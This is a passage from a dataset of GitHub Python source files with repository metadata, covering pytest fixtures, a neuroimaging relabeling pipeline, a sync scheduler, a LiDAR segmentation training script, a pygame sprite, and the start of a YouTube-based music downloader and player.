quafing.distance.information_distance.information_distance(p1,p2,method='None',pwdist='avg')\n\ndef test_validate_input():\n with pytest.raises(RuntimeError):\n p1 = {1: 0.2, 2: 0.1, 3: 0.3, 4: 0.4}\n p2 = list({1: 0.2, 2: 0.1, 4: 0.7})\n quafing.distance.information_distance.information_distance(p1,p2,method='kl',pwdist='avg')","repo_name":"SDCCA/quafing","sub_path":"tests/test_distance.py","file_name":"test_distance.py","file_ext":"py","file_size_in_byte":4560,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"4255285694","text":"# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. If a copy of the MPL was not distributed with this\n# file, You can obtain one at https://mozilla.org/MPL/2.0/.\n\"\"\" Global sisl fixtures \"\"\"\nimport os\nfrom pathlib import Path\n\nimport numpy as np\nimport pytest\n\nfrom sisl import Atom, Geometry, Hamiltonian, Lattice, _environ\n\n# Here we create the necessary methods and fixtures to enabled/disable\n# tests depending on whether a sisl-files directory is present.\n\n\n# Modify items based on whether the env is correct or not\ndef pytest_collection_modifyitems(config, items):\n sisl_files_tests = _environ.get_environ_variable(\"SISL_FILES_TESTS\")\n if sisl_files_tests.is_dir():\n if (sisl_files_tests / \"sisl\").is_dir():\n return\n print(f\"pytest-sisl: Could not locate sisl directory in: {sisl_files_tests}\")\n return\n\n xfail_sisl_files = pytest.mark.xfail(\n run=False,\n reason=\"requires env(SISL_FILES_TESTS) pointing to clone of: https://github.com/zerothi/sisl-files\",\n )\n for item in items:\n # Only skip those that have the sisl_files fixture\n # GLOBAL skipping of ALL tests that don't have this fixture\n if \"sisl_files\" in item.fixturenames:\n item.add_marker(xfail_sisl_files)\n\n\n@pytest.fixture(scope=\"function\")\ndef sisl_tmp(request, tmp_path_factory):\n \"\"\"sisl specific temporary file and directory creator.\n\n sisl_tmp(file, dir_name='sisl')\n sisl_tmp.file(file, dir_name='sisl')\n sisl_tmp.dir('sisl')\n\n The scope of the `sisl_tmp` fixture is at a function level to\n clean up after each function.\n \"\"\"\n\n class FileFactory:\n def __init__(self):\n self.base = tmp_path_factory.getbasetemp()\n self.dirs = [self.base]\n self.files = []\n\n def dir(self, name=\"sisl\"):\n # Make name a path\n D = Path(name.replace(os.path.sep, \"-\"))\n if not (self.base / D).is_dir():\n # tmp_path_factory.mktemp returns pathlib.Path\n self.dirs.append(tmp_path_factory.mktemp(str(D), numbered=False))\n\n return self.dirs[-1]\n\n def file(self, name, dir_name=\"sisl\"):\n # self.base *is* a pathlib\n D = self.base / dir_name.replace(os.path.sep, \"-\")\n if D in self.dirs:\n i = self.dirs.index(D)\n else:\n self.dir(dir_name)\n i = -1\n self.files.append(self.dirs[i] / name)\n return str(self.files[-1])\n\n def getbase(self):\n return self.dirs[-1]\n\n def __call__(self, name, dir_name=\"sisl\"):\n \"\"\"Shorthand for self.file\"\"\"\n return self.file(name, dir_name)\n\n def teardown(self):\n while len(self.files) > 0:\n # Do each removal separately\n f = self.files.pop()\n if f.is_file():\n try:\n f.close()\n except Exception:\n pass\n try:\n f.unlink()\n except Exception:\n pass\n while len(self.dirs) > 0:\n # Do each removal separately (from back of directory)\n d = self.dirs.pop()\n if d.is_dir():\n try:\n d.rmdir()\n except Exception:\n pass\n\n ff = FileFactory()\n request.addfinalizer(ff.teardown)\n return ff\n\n\n@pytest.fixture(scope=\"session\")\ndef sisl_files():\n \"\"\"Environment catcher for the large files hosted in a different repository.\n\n If SISL_FILES_TESTS has been defined in the environment variable the directory\n will be used for the tests with this as a fixture.\n\n If the environment variable is empty and a test has this fixture, it will\n be skipped.\n \"\"\"\n sisl_files_tests = _environ.get_environ_variable(\"SISL_FILES_TESTS\")\n if not sisl_files_tests.is_dir():\n\n def _path(*files):\n pytest.xfail(\n reason=f\"Environment SISL_FILES_TESTS not pointing to a valid directory.\",\n run=False,\n )\n\n return _path\n\n def _path(*files):\n p = sisl_files_tests.joinpath(*files)\n if p.exists():\n return p\n # I expect this test to fail due to the wrong environment.\n # But it isn't an actual fail since it hasn't runned...\n pytest.xfail(\n reason=f\"Environment SISL_FILES_TESTS may point to a wrong path(?); file {p} not found\",\n run=False,\n )\n\n return _path\n\n\n@pytest.fixture(scope=\"session\")\ndef sisl_system():\n \"\"\"A preset list of geometries/Hamiltonians.\"\"\"\n\n class System:\n pass\n\n d = System()\n\n alat = 1.42\n sq3h = 3.0**0.5 * 0.5\n C = Atom(Z=6, R=1.42)\n lattice = Lattice(\n np.array([[1.5, sq3h, 0.0], [1.5, -sq3h, 0.0], [0.0, 0.0, 10.0]], np.float64)\n * alat,\n nsc=[3, 3, 1],\n )\n d.g = Geometry(\n np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]], np.float64) * alat,\n atoms=C,\n lattice=lattice,\n )\n\n d.R = np.array([0.1, 1.5])\n d.t = np.array([0.0, 2.7])\n d.tS = np.array([(0.0, 1.0), (2.7, 0.0)])\n d.C = Atom(Z=6, R=max(d.R))\n d.lattice = Lattice(\n np.array([[1.5, sq3h, 0.0], [1.5, -sq3h, 0.0], [0.0, 0.0, 10.0]], np.float64)\n * alat,\n nsc=[3, 3, 1],\n )\n d.gtb = Geometry(\n np.array([[0.0, 0.0, 0.0], [1.0, 0.0, 0.0]], np.float64) * alat,\n atoms=C,\n lattice=lattice,\n )\n\n d.ham = Hamiltonian(d.gtb)\n d.ham.construct([(0.1, 1.5), (0.1, 2.7)])\n return d\n\n\n# We are ignoring stuff in sisl.viz.plotly if plotly cannot be imported\n# collect - ignore seems not to fully work... I should report this upstream.\n# however, the pytest_ignore_collect seems very stable and favourable\ncollect_ignore = [\"setup.py\"]\ncollect_ignore_glob = []\n\n# skip paths\n_skip_paths = []\ntry:\n import plotly\nexcept ImportError:\n _skip_paths.append(os.path.join(\"sisl\", \"viz\", \"plotly\"))\n\n\ndef pytest_ignore_collect(path, config):\n # ensure we only compare against final *sisl* stuff\n global _skip_paths\n parts = list(Path(path).parts)\n parts.reverse()\n sisl_parts = parts[: parts.index(\"sisl\")]\n sisl_parts.reverse()\n sisl_path = str(Path(\"sisl\").joinpath(*sisl_parts))\n\n for skip_path in _skip_paths:\n if skip_path in sisl_path:\n return True\n return False\n\n\ndef pytest_configure(config):\n pytest.sisl_travis_skip = pytest.mark.skipif(\n os.environ.get(\"SISL_TRAVIS_CI\", \"false\").lower() == \"true\",\n reason=\"running on TRAVIS\",\n )\n\n # Locally manage pytest.ini input\n for mark in [\n \"io\",\n \"generic\",\n \"bloch\",\n \"hamiltonian\",\n \"geometry\",\n \"geom\",\n \"shape\",\n \"state\",\n \"electron\",\n \"phonon\",\n \"utils\",\n \"unit\",\n \"distribution\",\n \"spin\",\n \"self_energy\",\n \"help\",\n \"messages\",\n \"namedindex\",\n \"sparse\",\n \"lattice\",\n \"supercell\",\n \"sc\",\n \"quaternion\",\n \"sparse_geometry\",\n \"sparse_orbital\",\n \"ranges\",\n \"physics\",\n \"physics_feature\",\n \"orbital\",\n \"oplist\",\n \"grid\",\n \"atoms\",\n \"atom\",\n \"sgrid\",\n \"sdata\",\n \"sgeom\",\n \"version\",\n \"bz\",\n \"brillouinzone\",\n \"monkhorstpack\",\n \"bandstructure\",\n \"inv\",\n \"eig\",\n \"linalg\",\n \"density_matrix\",\n \"dynamicalmatrix\",\n \"energydensity_matrix\",\n \"siesta\",\n \"tbtrans\",\n \"vasp\",\n \"w90\",\n \"wannier90\",\n \"gulp\",\n \"fdf\",\n \"fhiaims\",\n \"aims\",\n \"orca\",\n \"collection\",\n \"category\",\n \"geom_category\",\n \"plot\",\n \"slow\",\n \"selector\",\n \"overlap\",\n \"mixing\",\n \"typing\",\n \"only\",\n \"viz\",\n \"processors\",\n \"data\",\n \"plots\",\n \"plotters\",\n ]:\n config.addinivalue_line(\n \"markers\", f\"{mark}: mark test to run only on named environment\"\n )\n","repo_name":"zerothi/sisl","sub_path":"src/sisl/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"61"} +{"seq_id":"71812780995","text":"import os\n\n#=============================================================================\n# Setup: import libraries, set file paths, and initialize main workflow\n#=============================================================================\n#-----------------------------------------------------------------------------\n# Steps to run\n#-----------------------------------------------------------------------------\ndo_load_vtk_surfaces = False\ndo_combine_atlas_labels = 1\ndo_convert_atlas_annot = 1\ndo_convert_original_atlas_annot = 1\ncopy_to_output = 1\n#-----------------------------------------------------------------------------\n# From settings.py\n#-----------------------------------------------------------------------------\noutput_path = '/projects/Mindboggle/output' # Where to save processing output\nsubjects_path = os.environ['SUBJECTS_DIR'] # FreeSurfer subjects directory\ncopy_path = subjects_path\nbase_path = '/projects/Mindboggle/mindboggle' # Mindboggle home directory\ninfo_path = '/projects/Mindboggle/mindboggle/mindboggle/info' # info directory\ntemp_path = os.path.join(output_path, 'workspace') # Where to save temp files\nlabel_string_old = 'labels.DKT31.manual'\nlabel_string = 'labels.DKT25.manual'\nrelabel_file = os.path.join(info_path, 'labels.surface.DKT31to25.txt')\nhemis = ['lh','rh']\n#-----------------------------------------------------------------------------\n# Subjects to process\n#-----------------------------------------------------------------------------\nfrom mindboggle.utils.io_table import read_columns\natlas_list_file = os.path.join(info_path, 'atlases101.txt')\nsubjects = read_columns(atlas_list_file, 1)[0]\nsubjects = ['OASIS-TRT-20-11']\n#-----------------------------------------------------------------------------\n# Import system and nipype Python libraries\n#-----------------------------------------------------------------------------\nfrom nipype.pipeline.engine import Workflow, Node\nfrom nipype.interfaces.utility import Function as Fn\nfrom nipype.interfaces.utility import IdentityInterface\nfrom nipype.interfaces.io import DataGrabber, DataSink\n#-----------------------------------------------------------------------------\n# Import Mindboggle Python libraries\n#-----------------------------------------------------------------------------\nfrom mindboggle.utils.io_vtk import annot_to_vtk, surface_to_vtk\nfrom mindboggle.label.relabel import relabel_annot_file\n#-----------------------------------------------------------------------------\n# Initialize main workflow\n#-----------------------------------------------------------------------------\nflow = Workflow(name='Atlas_relabeling_workflow')\nflow.base_dir = temp_path\nif not os.path.isdir(temp_path): os.makedirs(temp_path)\n\n#=============================================================================\n# Inputs and outputs\n#=============================================================================\n#-----------------------------------------------------------------------------\n# Iterate inputs over subjects, hemispheres\n# (surfaces are assumed to take the form: lh.pial or lh.pial.vtk)\n#-----------------------------------------------------------------------------\ninfo = Node(name = 'Inputs',\n interface = IdentityInterface(fields=['subject', 'hemi']))\ninfo.iterables = ([('subject', subjects), ('hemi', hemis)])\n#-----------------------------------------------------------------------------\n# Location and structure of the surface inputs\n#-----------------------------------------------------------------------------\nsurf = Node(name = 'Surfaces',\n interface = DataGrabber(infields=['subject', 'hemi'],\n outfields=['surface_files']))\nsurf.inputs.base_directory = subjects_path\nsurf.inputs.template = os.path.join('%s', 'surf', '%s.%s')\nsurf.inputs.template_args['surface_files'] = [['subject', 'hemi', 'pial']]\nflow.connect([(info, surf, [('subject','subject'), ('hemi','hemi')])])\n#-----------------------------------------------------------------------------\n# Outputs\n#-----------------------------------------------------------------------------\ndatasink = Node(DataSink(), name = 'Results')\ndatasink.inputs.base_directory = output_path\ndatasink.inputs.container = 'results'\nif not os.path.isdir(output_path): os.makedirs(output_path)\n\n#-------------------------------------------------------------------------------\n# Convert surfaces to VTK\n#-------------------------------------------------------------------------------\nif not do_load_vtk_surfaces:\n convertsurf = Node(name = 'Surf_to_VTK',\n interface = Fn(function = freesurface_to_vtk,\n input_names = ['surface_file'],\n output_names = ['vtk_file']))\n flow.connect([(surf, convertsurf, [('surface_files','surface_file')])])\n\n#=============================================================================\n# Combine .annot labels and convert to VTK\n#=============================================================================\natlasflow = Workflow(name='Atlas_workflow')\natlasflow.base_dir = temp_path\n\n#-------------------------------------------------------------------------\n# Combine atlas .annot labels\n#-------------------------------------------------------------------------\nif do_combine_atlas_labels:\n combine_labels = Node(name='Combine_atlas_labels',\n interface = Fn(function = relabel_annot_file,\n input_names = ['hemi',\n 'subject',\n 'annot_name',\n 'new_annot_name',\n 'relabel_file'],\n output_names = ['new_annot_name']))\n atlasflow.add_nodes([combine_labels])\n combine_labels.inputs.annot_name = label_string_old\n combine_labels.inputs.new_annot_name = label_string\n combine_labels.inputs.relabel_file = relabel_file\n flow.connect([(info, atlasflow, [('hemi','Combine_atlas_labels.hemi'),\n ('subject','Combine_atlas_labels.subject')])])\n\n#-----------------------------------------------------------------------------\n# Convert .annot labels to VTK format\n#-----------------------------------------------------------------------------\nif do_convert_atlas_annot:\n atlas_vtk = Node(name = 'Convert_atlas_labels',\n interface = Fn(function = freeannot_to_vtk,\n input_names = ['surface_file',\n 'hemi',\n 'subject',\n 'subjects_path',\n 'annot_name'],\n output_names = ['vtk_file']))\n atlasflow.add_nodes([atlas_vtk])\n flow.connect([(info, atlasflow,\n [('hemi','Convert_atlas_labels.hemi'),\n ('subject','Convert_atlas_labels.subject')])])\n atlas_vtk.inputs.subjects_path = subjects_path\n atlasflow.connect([(combine_labels, atlas_vtk,\n [('new_annot_name','annot_name')])])\n if do_load_vtk_surfaces:\n flow.connect([('surf', 'Convert_atlas_labels.atlas_vtk',\n [('surface_files','Convert_atlas_labels.surface_file')])])\n else:\n flow.connect([(convertsurf, atlasflow,\n [('vtk_file','Convert_atlas_labels.surface_file')])])\n# flow.connect([(atlasflow, datasink,\n# [('Convert_atlas_labels.vtk_file','atlas_labels')])])\n\n\nif do_convert_original_atlas_annot:\n orig_atlas_vtk = Node(name = 'Convert_original_atlas_labels',\n interface = Fn(function = freeannot_to_vtk,\n input_names = ['surface_file',\n 'hemi',\n 'subject',\n 'subjects_path',\n 'annot_name'],\n output_names = ['vtk_file']))\n atlasflow.add_nodes([orig_atlas_vtk])\n flow.connect([(info, atlasflow,\n [('hemi','Convert_original_atlas_labels.hemi'),\n ('subject','Convert_original_atlas_labels.subject')])])\n orig_atlas_vtk.inputs.subjects_path = subjects_path\n orig_atlas_vtk.inputs.annot_name = label_string_old\n if do_load_vtk_surfaces:\n flow.connect([('surf', 'Convert_original_atlas_labels.atlas_vtk',\n [('surface_files','Convert_original_atlas_labels.surface_file')])])\n else:\n flow.connect([(convertsurf, atlasflow,\n [('vtk_file','Convert_original_atlas_labels.surface_file')])])\n# flow.connect([(atlasflow, datasink,\n# [('Convert_original_atlas_labels.vtk_file','atlas_labels')])])\n\n##############################################################################\nif __name__== '__main__':\n flow.run()\n\n#-------------------------------------------------------------------------\n# Copy results to atlas label directories\n#-------------------------------------------------------------------------\nif copy_to_output:\n\n for s in subjects:\n for h in hemis:\n\n if do_convert_atlas_annot:\n src = os.path.join(temp_path, #output_path, datasink.inputs.container,\n 'Atlas_relabeling_workflow',\n 'Atlas_workflow',\n '_hemi_' + h + '_subject_' + s,\n 'Convert_atlas_labels',\n h + '.pial.' + label_string + '.vtk')\n tgt = os.path.join(copy_path, s, 'label', h + '.' + label_string + '.vtk')\n cmd = ' '.join(['cp', src, tgt])\n print(cmd); os.system(cmd)\n\n if do_convert_original_atlas_annot:\n src = os.path.join(temp_path, #output_path, datasink.inputs.container,\n 'Atlas_relabeling_workflow',\n 'Atlas_workflow',\n '_hemi_' + h + '_subject_' + s,\n 'Convert_original_atlas_labels',\n h + '.pial.' + label_string_old + '.vtk')\n tgt = os.path.join(copy_path, s, 'label', h + '.' + label_string_old + '.vtk')\n cmd = ' '.join(['cp', src, tgt])\n print(cmd); os.system(cmd)\n\n","repo_name":"binarybottle/mindboggle_sidelined","sub_path":"relabel_atlas_pipeline.py","file_name":"relabel_atlas_pipeline.py","file_ext":"py","file_size_in_byte":10825,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12695470108","text":"# -*- coding: utf-8 -*-\n\nfrom ..index import IndexTree\n\n\nclass SyncScheduler(object):\n \"\"\"Browse dirty indexes and find the node that should be cleaned first.\n\n It contains the list of IndexTree to browse. The scheduler handles the\n different states of the trees (some are clean, some are waiting for task to\n finish, ...), and returns the node (with `get_node()`) in the best order\n possible.\n\n When possible, the scheduler try to grep the nodes per tree.\n \"\"\"\n\n def __init__(self):\n self._index_trees = []\n\n # index of, the next tree to browse in self._index_trees\n self._index_next_tree = 0\n\n self._generators = []\n\n def add_index_tree(self, tree):\n \"\"\"Add a new tree to browse.\n\n Args:\n tree (IndexTree): new tree to browse.\n \"\"\"\n self._index_trees.append(tree)\n\n def remove_index_tree(self, tree):\n \"\"\"Remove an index tree from the list\n\n If it's not in the list, do nothing.\n\n Args:\n tree (IndexTree): the tree to remove.\n \"\"\"\n\n try:\n self._index_trees.remove(tree)\n except ValueError:\n return\n\n if self._index_next_tree >= len(self._index_trees):\n self._index_next_tree = 0\n\n for idx, data_tree in enumerate(self._generators):\n if data_tree['tree'] is tree:\n data_tree['gen'].close()\n del self._generators[idx]\n return\n\n def get_node(self):\n \"\"\"Find the next node that should be sync.\n\n Returns:\n Tuple(Optional [IndexTree], Optional[Node]): the next node to sync\n and the IndexTree the node belongs to. If there is none\n available, return (None, None)\n \"\"\"\n\n for data_tree in self._generators[:]:\n try:\n node = next(data_tree['gen'])\n except StopIteration:\n self._generators.remove(data_tree)\n else:\n if node is not IndexTree.WAIT_FOR_TASK:\n return data_tree['tree'], node\n\n if len(self._generators) >= len(self._index_trees):\n # All trees have a generator\n return None, None\n\n # new generator needed;\n start_index = self._index_next_tree\n while True:\n tree = self._index_trees[self._index_next_tree]\n self._index_next_tree += 1\n self._index_next_tree %= len(self._index_trees)\n\n if tree not in (gen.get('tree') for gen in self._generators):\n gen = tree.browse_all_non_sync_nodes()\n\n try:\n node = next(gen)\n except StopIteration:\n pass # clean tree\n else:\n self._generators.append({'tree': tree, 'gen': gen})\n if node is not IndexTree.WAIT_FOR_TASK:\n return tree, node\n\n if self._index_next_tree == start_index:\n # We've tested all trees.\n return None, None\n","repo_name":"Bajoo/client-pc","sub_path":"bajoo/filesync/sync_scheduler.py","file_name":"sync_scheduler.py","file_ext":"py","file_size_in_byte":3083,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"35319050612","text":"import os\nimport random\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport argparse\nimport time\nimport pdb\n\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data.distributed import DistributedSampler\n\nimport datasets\n\nfrom utils.metric import MultiClassMetric\nfrom models import *\n\nimport tqdm\nimport logging\nimport importlib\nfrom utils.logger import config_logger\nfrom utils import builder\n\n\nimport torch.backends.cudnn as cudnn\ncudnn.deterministic = True\ncudnn.benchmark = False\n\n\ndef reduce_tensor(inp):\n \"\"\"\n Reduce the loss from all processes so that\n process with rank 0 has the averaged results.\n \"\"\"\n world_size = torch.distributed.get_world_size()\n if world_size < 2:\n return inp\n with torch.no_grad():\n reduced_inp = inp\n torch.distributed.reduce(reduced_inp, dst=0)\n return reduced_inp\n\n\ndef train_fp16(epoch, end_epoch, args, model, train_loader, optimizer, scheduler, logger, log_frequency):\n scaler = torch.cuda.amp.GradScaler()\n rank = torch.distributed.get_rank()\n model.train()\n for i, (pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw, seq_id, fn) in tqdm.tqdm(enumerate(train_loader)):\n #pdb.set_trace()\n with torch.cuda.amp.autocast():\n loss_list = model(pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw)\n loss = loss_list.sum()\n\n optimizer.zero_grad()\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n scheduler.step()\n\n reduced_loss_list = reduce_tensor(loss_list)\n if (i % log_frequency == 0) and rank == 0:\n string = 'Epoch: [{}]/[{}]; Iteration: [{}]/[{}]; lr: {}'.format(epoch, end_epoch,\\\n i, len(train_loader), optimizer.state_dict()['param_groups'][0]['lr'])\n for n in range(loss_list.shape[0]):\n string = string + '; loss_stage_{0}: {1}'.format(n, reduced_loss_list[n].item() / torch.distributed.get_world_size())\n logger.info(string)\n\n\ndef train(epoch, end_epoch, args, model, train_loader, optimizer, scheduler, logger, log_frequency):\n rank = torch.distributed.get_rank()\n model.train()\n for i, (pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw, seq_id, fn) in tqdm.tqdm(enumerate(train_loader)):\n #pdb.set_trace()\n loss_list = model(pcds_xyzi, pcds_coord, pcds_sphere_coord, pcds_target, pcds_xyzi_raw, pcds_coord_raw, pcds_sphere_coord_raw)\n loss = loss_list.sum()\n\n optimizer.zero_grad()\n loss.backward()\n optimizer.step()\n scheduler.step()\n\n reduced_loss_list = reduce_tensor(loss_list)\n if (i % log_frequency == 0) and rank == 0:\n string = 'Epoch: [{}]/[{}]; Iteration: [{}]/[{}]; lr: {}'.format(epoch, end_epoch,\\\n i, len(train_loader), optimizer.state_dict()['param_groups'][0]['lr'])\n for n in range(loss_list.shape[0]):\n string = string + '; loss_stage_{0}: {1}'.format(n, reduced_loss_list[n].item() / torch.distributed.get_world_size())\n logger.info(string)\n\n\ndef main(args, config):\n # parsing cfg\n pGen, pDataset, pModel, pOpt = config.get_config()\n\n prefix = pGen.name\n save_path = os.path.join(\"experiments\", prefix)\n model_prefix = os.path.join(save_path, \"checkpoint\")\n\n os.system('mkdir -p {}'.format(model_prefix))\n\n # start logging\n config_logger(os.path.join(save_path, \"log.txt\"))\n logger = logging.getLogger()\n\n # reset dist\n local_rank = int(os.getenv(\"LOCAL_RANK\"))\n device = torch.device('cuda:{}'.format(local_rank))\n torch.cuda.set_device(local_rank)\n torch.distributed.init_process_group(backend='nccl', init_method='env://')\n world_size = torch.distributed.get_world_size()\n rank = torch.distributed.get_rank()\n\n # reset random seed\n seed = rank * pDataset.Train.num_workers + 50051\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n\n # define dataloader\n train_dataset = eval('datasets.{}.DataloadTrain'.format(pDataset.Train.data_src))(pDataset.Train)\n train_sampler = DistributedSampler(train_dataset)\n train_loader = DataLoader(train_dataset,\n batch_size=pGen.batch_size_per_gpu,\n shuffle=(train_sampler is None),\n num_workers=pDataset.Train.num_workers,\n sampler=train_sampler,\n pin_memory=True)\n\n print(\"rank: {}/{}; batch_size: {}\".format(rank, world_size, pGen.batch_size_per_gpu))\n\n # define model\n base_net = eval(pModel.prefix).AttNet(pModel)\n # load pretrain model\n pretrain_model = os.path.join(model_prefix, '{}-model.pth'.format(pModel.pretrain.pretrain_epoch))\n if os.path.exists(pretrain_model):\n base_net.load_state_dict(torch.load(pretrain_model, map_location='cpu'))\n logger.info(\"Load model from {}\".format(pretrain_model))\n\n base_net = nn.SyncBatchNorm.convert_sync_batchnorm(base_net)\n model = torch.nn.parallel.DistributedDataParallel(base_net.to(device),\n device_ids=[local_rank],\n output_device=local_rank,\n find_unused_parameters=True)\n\n # define optimizer\n optimizer = builder.get_optimizer(pOpt, model)\n\n # define scheduler\n per_epoch_num_iters = len(train_loader)\n scheduler = builder.get_scheduler(optimizer, pOpt, per_epoch_num_iters)\n\n if rank == 0:\n logger.info(model)\n logger.info(optimizer)\n logger.info(scheduler)\n\n # start training\n for epoch in range(pOpt.schedule.begin_epoch, pOpt.schedule.end_epoch):\n train_sampler.set_epoch(epoch)\n if pGen.fp16:\n train_fp16(epoch, pOpt.schedule.end_epoch, args, model, train_loader, optimizer, scheduler, logger, pGen.log_frequency)\n else:\n train(epoch, pOpt.schedule.end_epoch, args, model, train_loader, optimizer, scheduler, logger, pGen.log_frequency)\n\n # save model\n if rank == 0:\n torch.save(model.module.state_dict(), os.path.join(model_prefix, '{}-model.pth'.format(epoch)))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='lidar segmentation')\n parser.add_argument('--config', help='config file path', type=str)\n\n args = parser.parse_args()\n config = importlib.import_module(args.config.replace('.py', '').replace('/', '.'))\n main(args, config)","repo_name":"GangZhang842/CPGNet","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6793,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"11965944666","text":"import pygame\nfrom pygame.sprite import Sprite\nfrom settings import Settings\n\nclass Raindrop(Sprite):\n \"\"\"A class to represent a single star.\"\"\"\n\n def __init__(self, screen, settings):\n super().__init__()\n self.screen = screen\n self.settings = settings\n\n # Load the star image and set its rect attribute.\n self.image = pygame.image.load('D:/Users/growl/Gregor Rowley/' + \n 'Programming/Python/python_work/alien_invasion/images/raindrop.bmp')\n self.rect = self.image.get_rect()\n\n # Start each star close to the top left of the screen.\n self.rect.x = self.rect.width\n self.rect.y = self.rect.height\n\n self.y = float(self.rect.y)\n\n def blitme(self):\n \"\"\"Draw a star to the screen.\"\"\"\n pygame.screen.blit(self.image, self.rect)\n\n\n def check_edges(self):\n \"\"\"Return true if a raindrop drops past the bottom of the screen.\"\"\"\n screen_rect = self.screen.get_rect()\n if self.rect.bottom >= screen_rect.bottom:\n return True\n \n\n def update(self):\n \"\"\"Move the raindrops down the screen.\"\"\"\n self.y += self.settings.raindrop_speed_factor\n self.rect.y = self.y","repo_name":"GRow1ey/python_work","sub_path":"alien_invasion/Exercises/Raindrops/raindrop.py","file_name":"raindrop.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"121019248","text":"#!usr/local/bin/python3\n#import all necessary modules\nimport os\ntry:\n import vlc\nexcept:\n print('\\n[-] PLEASE INSTALL VLC MEDIA PLAYER IN ORDER TO RUN THIS PROGRAM')\nimport shutil\nfrom pynput import keyboard\nfrom colorama import init\nfrom termcolor import colored\nfrom time import sleep\nfrom random import shuffle\nfrom bs4 import BeautifulSoup\nfrom requests import get\nfrom threading import Thread\n\n#declare all vars\nglobal playlist\nglobal played\nglobal mp3_player\nglobal keys\nglobal s_name\nglobal per_folder\nglobal kill_thread\nglobal progress\n\n#declare all lambdas\nbase_name = lambda name : os.path.basename(name)\nparse_trailing_space = lambda x : x[:-1] if x[-1] == ' ' else x\ninit()\n\ndef get_songs(dirNames,choice):\n allFiles = []\n for dirName in dirNames: \n listOfFile = os.listdir(dirName) \n for entry in listOfFile:\n fullPath = os.path.join(dirName, entry)\n if os.path.isdir(fullPath) and choice:\n allFiles = allFiles + get_songs([fullPath],1)\n else:\n a = fullPath\n if a[-3:] == \"mp3\" or a[-3:] == \"wav\" or a[-3:] == \"ogg\" or a[-4:] == \"flac\" or a[-3:] == \"m4a\" and a[0:2] != '._':\n allFiles.append(fullPath)\n return allFiles\nkill_thread = 1\nprogress = 0\nkeys = []\ntype_music = ''\nper_folder = \"songs/my_playlist\"\nif not os.path.isdir(os.getcwd()+'/'+per_folder):#create personal playlist folder if it does'nt exist\n #os.system('mkdir songs && mkdir songs/my_playlist')\n os.mkdir(\"songs\")\n os.mkdir(per_folder)\nplayed = []\ns_name = ''\nplaylist = []\nrepeat_var = 0\ntype_music1 = lambda : type_music\n\nclass down_songs:#object to download songs\n\n def __init__(self,name,path):#init function for downloading songs\n\n self.name = name\n self.path = path\n\n def search(self):#search for the song in youtube\n\n URL = 'https://www.google.com/search?source=hp&ei=DMZHX8SiFreJ4-EP7rW_-Ao&q='+self.name+'+site%3Ayoutube.com&oq='+self.name+'+site%3Atamilrockers.ws&gs_lcp=CgZwc3ktYWIQAzoOCAAQ6gIQtAIQmgEQ5QI6AggAOgIILjoICAAQsQMQgwE6BQguEJMCOggILhCxAxCDAToLCC4QsQMQgwEQkwI6BQguELEDOgUIABCxAzoICC4QsQMQkwI6BggAEBYQHlCFGVixUGDJUmgBcAB4AIABggGIAccPkgEEMjYuMZgBAKABAaoBB2d3cy13aXqwAQY&sclient=psy-ab&ved=0ahUKEwjE2OjtzrvrAhW3xDgGHe7aD68Q4dUDCAY&uact=5'\n USER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0\"\n headers = {\"user-agent\" : USER_AGENT}\n print()\n pri = colored('[-] LOCATING YOUR SONG','green',attrs=['bold'])\n print(pri)\n resp = get(URL, headers=headers)\n soup = BeautifulSoup(resp.content, \"html.parser\")\n results = []\n for g in soup.find_all('div', class_='g'):\n anchors = g.find_all('a')\n descript = g.find_all('h3')\n if anchors:\n link = anchors[0]['href']\n desc = descript[0].text\n low_name = self.name.lower().split(' ')\n if not [a for a in low_name if a in desc.lower().split(' ')]:\n continue\n item = {\n \"link\": link,\n }\n results.append(item)\n if not results:\n print()\n pri = colored('[-] COULD NOT FIND YOUR SONG. MAKE SURE YOU USE THE SAME WORDS AS IT APPEARS IN THE OFFICIAL RELEASE','red',attrs=['bold'])\n print(pri)\n return 0\n return results[0]['link'].split('?v=')[-1]\n\n def get_link(self,suffix):#get link for downloading file\n\n url = 'https://www.yt-download.org/api/button/mp3/'+suffix\n USER_AGENT = \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:65.0) Gecko/20100101 Firefox/65.0\"\n headers = {\"user-agent\" : USER_AGENT}\n print()\n pri = colored('[-] PREPARING FOR DOWNLOAD','green',attrs=['bold'])\n print(pri)\n resp = get(url, headers=headers)\n soup = BeautifulSoup(resp.content, \"html.parser\")\n link = soup.find_all('a')[0]['href']\n return link\n\n def download(self,link):#download file from link\n\n print()\n pri = colored('[-] BE CALM, SMILE :) AND RELAX. YOUR SONG IS DOWNLOADING','green',attrs=['bold'])\n print(pri)\n r = get(link,allow_redirects=True)\n if open(self.path+self.name.lower()+'.mp3','wb').write(r.content):\n 